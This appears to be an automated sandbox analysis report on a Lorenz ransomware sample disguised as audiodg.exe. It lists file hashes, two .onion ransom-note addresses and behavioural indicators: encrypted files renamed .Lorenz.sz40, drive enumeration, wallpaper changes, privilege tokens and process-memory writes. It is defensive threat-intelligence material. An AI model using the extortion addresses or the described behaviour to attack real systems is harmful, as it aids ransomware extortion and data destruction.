Analysis
-
max time kernel
371s -
max time network
366s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
14/11/2021, 04:39
Static task
static1
Behavioral task
behavioral1
Sample
audiodg.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
audiodg.exe
Resource
win10-en-20211104
General
-
Target
audiodg.exe
-
Size
1.1MB
-
MD5
7b760f60fff500d3c7c408a8bc158e0e
-
SHA1
a4b41efc63460f980130b67eb33c0bd061206744
-
SHA256
a0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f
-
SHA512
13662b1447806779d82a29fbb931ec8d400adacd9074c4bbce8db8afd34bbf0c87e43b7790c1631b8d4edc870dbf5348773beadea59a3f73438cdb072c24ae75
Malware Config
Extracted
C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\HELP_SECURITY_EVENT.html
Extracted
C:\Users\Admin\Desktop\HELP_SECURITY_EVENT.html
http://lorenzezzket6afhfqfjagefsrjn44edsgi26kq4sfhqjal6wyneh4yd.onion/
http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion
Signatures
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\GroupSearch.png.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\ResolveWait.raw.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\InstallShow.crw.Lorenz.sz40 audiodg.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: audiodg.exe File opened (read-only) \??\O: audiodg.exe File opened (read-only) \??\W: audiodg.exe File opened (read-only) \??\B: audiodg.exe File opened (read-only) \??\G: audiodg.exe File opened (read-only) \??\I: audiodg.exe File opened (read-only) \??\M: audiodg.exe File opened (read-only) \??\K: audiodg.exe File opened (read-only) \??\L: audiodg.exe File opened (read-only) \??\N: audiodg.exe File opened (read-only) \??\Q: audiodg.exe File opened (read-only) \??\A: audiodg.exe File opened (read-only) \??\E: audiodg.exe File opened (read-only) \??\F: audiodg.exe File opened (read-only) \??\H: audiodg.exe File opened (read-only) \??\S: audiodg.exe File opened (read-only) \??\U: audiodg.exe File opened (read-only) \??\V: audiodg.exe File opened (read-only) \??\Z: audiodg.exe File opened (read-only) \??\Y: audiodg.exe File opened (read-only) \??\P: audiodg.exe File opened (read-only) \??\R: audiodg.exe File opened (read-only) \??\T: audiodg.exe File opened (read-only) \??\X: audiodg.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\ECes1Ma81x0h.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_right.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\XLMACRO.CHM.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.XML.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam.Lorenz.sz40 audiodg.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\grvschema.xsd.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSTORY.XML.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jre7\lib\deploy\messages.properties.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21300_.GIF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.TLB.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\Discussion.gta.Lorenz.sz40 audiodg.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\STORYBB.POC.Lorenz.sz40 audiodg.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.Lorenz.sz40 audiodg.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\css\slideShow.css.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_COL.HXC.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip.Lorenz.sz40 audiodg.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_RGB6_PAL.wmv.Lorenz.sz40 audiodg.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00178_.WMF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Games\FreeCell\desktop.ini.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\MSQRY32.CHM.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\TexturedBlue.css.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\sr.pak.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.Lorenz.sz40 audiodg.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00194_.WMF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\Hierarchy.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107026.WMF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG.HXS.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BZCRD98.POC.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\Malta.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN054.XML.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ACCSBAR.POC.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPML.ICO.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Couture.eftx.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_COL.HXC.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF.Lorenz.sz40 audiodg.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\sl.pak.Lorenz.sz40 audiodg.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\vi.pak.Lorenz.sz40 audiodg.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\ECes1Ma81x0h.bmp audiodg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40b8709611d9d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C021FC41-4504-11EC-8F58-CE5848A428EA} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{34664C51-4505-11EC-8F58-CE5848A428EA} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "343629704" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bb601b266500a1439caac4cd216a44ab00000000020000000000106600000001000020000000ec32a5f505f3245a1a9bd8797d082839d7e13364f32f12818b9e6df59a74d7e3000000000e800000000200002000000027b1d52f9f4207fc43232ec5e705771c07dea67481533031fff0e87767dd877f200000006f58bb1b8f23bf0689ad930fd2ccb396a87c0033cc39788bb6802e5d634eb51f40000000abaf38a84cf3d1d9aa18d36ec6fbbdeecbdc50b8ed246f252cdccd3eeb1c26643dad732c35ad15a2a00d369412a1e9112dbee84964a423b72498687167a9a052 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bb601b266500a1439caac4cd216a44ab00000000020000000000106600000001000020000000f10f0278d26ad617041f8b1d2999a826dd5cc3a824813e04786416c9f5500e5d000000000e8000000002000020000000deb1c8ac88dd33a7a4d976ea7757b1a092916961984aafe99c2d8c3f0fdbb0ec90000000084fde8a42cd283467698d9bf51cd8f00d53b7871cf1867168d36c246ca4fd9f942ef0c7a526ba35680b4bf0f640e68a2d31df925f59ecd32af8dd18f29c7e4f1fa05d8977b6bad84b8b6b87f0874d9e5b2350c0ba43e06bca5beaaae3609c8ce988467de6879b94c98141a5a8626389194c4a5cd7ce96a4d024154d8d9ef18a8c3a828cf849355456a4046dce544e8e40000000bac33cb8d828ea88dfd7808df1ef7b40c3da17b3b2ba6835db617a5ee504643232ffd3875f283595cea9a48424426165e4789d1d6dc3393c1f0de0684828043e iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe -
Modifies data under HKEY_USERS 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-19\Control Panel\Desktop\Wallpaper = "C:\\Windows\\ECes1Ma81x0h.bmp" reg.exe Key created \REGISTRY\USER\S-1-5-20\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Control Panel\Desktop\Wallpaper = "C:\\Windows\\ECes1Ma81x0h.bmp" reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\ECes1Ma81x0h.bmp" reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\ECes1Ma81x0h.bmp" reg.exe Key created \REGISTRY\USER\S-1-5-19\Control Panel\Desktop reg.exe -
Modifies registry class 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000_CLASSES\Control Panel\Desktop\Wallpaper = "C:\\Windows\\ECes1Ma81x0h.bmp" reg.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000_Classes\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000_CLASSES\Control Panel reg.exe Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000_CLASSES\Control Panel\Desktop reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe 1520 audiodg.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1756 WMIC.exe Token: SeSecurityPrivilege 1756 WMIC.exe Token: SeTakeOwnershipPrivilege 1756 WMIC.exe Token: SeLoadDriverPrivilege 1756 WMIC.exe Token: SeSystemProfilePrivilege 1756 WMIC.exe Token: SeSystemtimePrivilege 1756 WMIC.exe Token: SeProfSingleProcessPrivilege 1756 WMIC.exe Token: SeIncBasePriorityPrivilege 1756 WMIC.exe Token: SeCreatePagefilePrivilege 1756 WMIC.exe Token: SeBackupPrivilege 1756 WMIC.exe Token: SeRestorePrivilege 1756 WMIC.exe Token: SeShutdownPrivilege 1756 WMIC.exe Token: SeDebugPrivilege 1756 WMIC.exe Token: SeSystemEnvironmentPrivilege 1756 WMIC.exe Token: SeRemoteShutdownPrivilege 1756 WMIC.exe Token: SeUndockPrivilege 1756 WMIC.exe Token: SeManageVolumePrivilege 1756 WMIC.exe Token: 33 1756 WMIC.exe Token: 34 1756 WMIC.exe Token: 35 1756 WMIC.exe Token: SeIncreaseQuotaPrivilege 1756 WMIC.exe Token: SeSecurityPrivilege 1756 WMIC.exe Token: SeTakeOwnershipPrivilege 1756 WMIC.exe Token: SeLoadDriverPrivilege 1756 WMIC.exe Token: SeSystemProfilePrivilege 1756 WMIC.exe Token: SeSystemtimePrivilege 1756 WMIC.exe Token: SeProfSingleProcessPrivilege 1756 WMIC.exe Token: SeIncBasePriorityPrivilege 1756 WMIC.exe Token: SeCreatePagefilePrivilege 1756 WMIC.exe Token: SeBackupPrivilege 1756 WMIC.exe Token: SeRestorePrivilege 1756 WMIC.exe Token: SeShutdownPrivilege 1756 WMIC.exe Token: SeDebugPrivilege 1756 WMIC.exe Token: SeSystemEnvironmentPrivilege 1756 WMIC.exe Token: SeRemoteShutdownPrivilege 1756 WMIC.exe Token: SeUndockPrivilege 1756 WMIC.exe Token: SeManageVolumePrivilege 1756 WMIC.exe Token: 33 1756 WMIC.exe Token: 34 1756 WMIC.exe Token: 35 1756 WMIC.exe Token: 33 2016 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2016 AUDIODG.EXE Token: 33 2016 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2016 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1496 iexplore.exe 1368 iexplore.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 1496 iexplore.exe 1496 iexplore.exe 1872 IEXPLORE.EXE 1872 IEXPLORE.EXE 1872 IEXPLORE.EXE 1872 IEXPLORE.EXE 1368 iexplore.exe 1368 iexplore.exe 472 IEXPLORE.EXE 472 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1520 wrote to memory of 1092 1520 audiodg.exe 29 PID 1520 wrote to memory of 1092 1520 audiodg.exe 29 PID 1520 wrote to memory of 1092 1520 audiodg.exe 29 PID 1520 wrote to memory of 1092 1520 audiodg.exe 29 PID 1092 wrote to memory of 1472 1092 cmd.exe 30 PID 1092 wrote to memory of 1472 1092 cmd.exe 30 PID 1092 wrote to memory of 1472 1092 cmd.exe 30 PID 1092 wrote to memory of 1472 1092 cmd.exe 30 PID 1520 wrote to memory of 1304 1520 audiodg.exe 31 PID 1520 wrote to memory of 1304 1520 audiodg.exe 31 PID 1520 wrote to memory of 1304 1520 audiodg.exe 31 PID 1520 wrote to memory of 1304 1520 audiodg.exe 31 PID 1520 wrote to memory of 1888 1520 audiodg.exe 33 PID 1520 wrote to memory of 1888 1520 audiodg.exe 33 PID 1520 wrote to memory of 1888 1520 audiodg.exe 33 PID 1520 wrote to memory of 1888 1520 audiodg.exe 33 PID 1888 wrote to memory of 292 1888 cmd.exe 34 PID 1888 wrote to memory of 292 1888 cmd.exe 34 PID 1888 wrote to memory of 292 1888 cmd.exe 34 PID 1888 wrote to memory of 292 1888 cmd.exe 34 PID 1304 wrote to memory of 1756 1304 cmd.exe 35 PID 1304 wrote to memory of 1756 1304 cmd.exe 35 PID 1304 wrote to memory of 1756 1304 cmd.exe 35 PID 1304 wrote to memory of 1756 1304 cmd.exe 35 PID 1520 wrote to memory of 2008 1520 audiodg.exe 36 PID 1520 wrote to memory of 2008 1520 audiodg.exe 36 PID 1520 wrote to memory of 2008 1520 audiodg.exe 36 PID 1520 wrote to memory of 2008 1520 audiodg.exe 36 PID 2008 wrote to memory of 432 2008 cmd.exe 37 PID 2008 wrote to memory of 432 2008 cmd.exe 37 PID 2008 wrote to memory 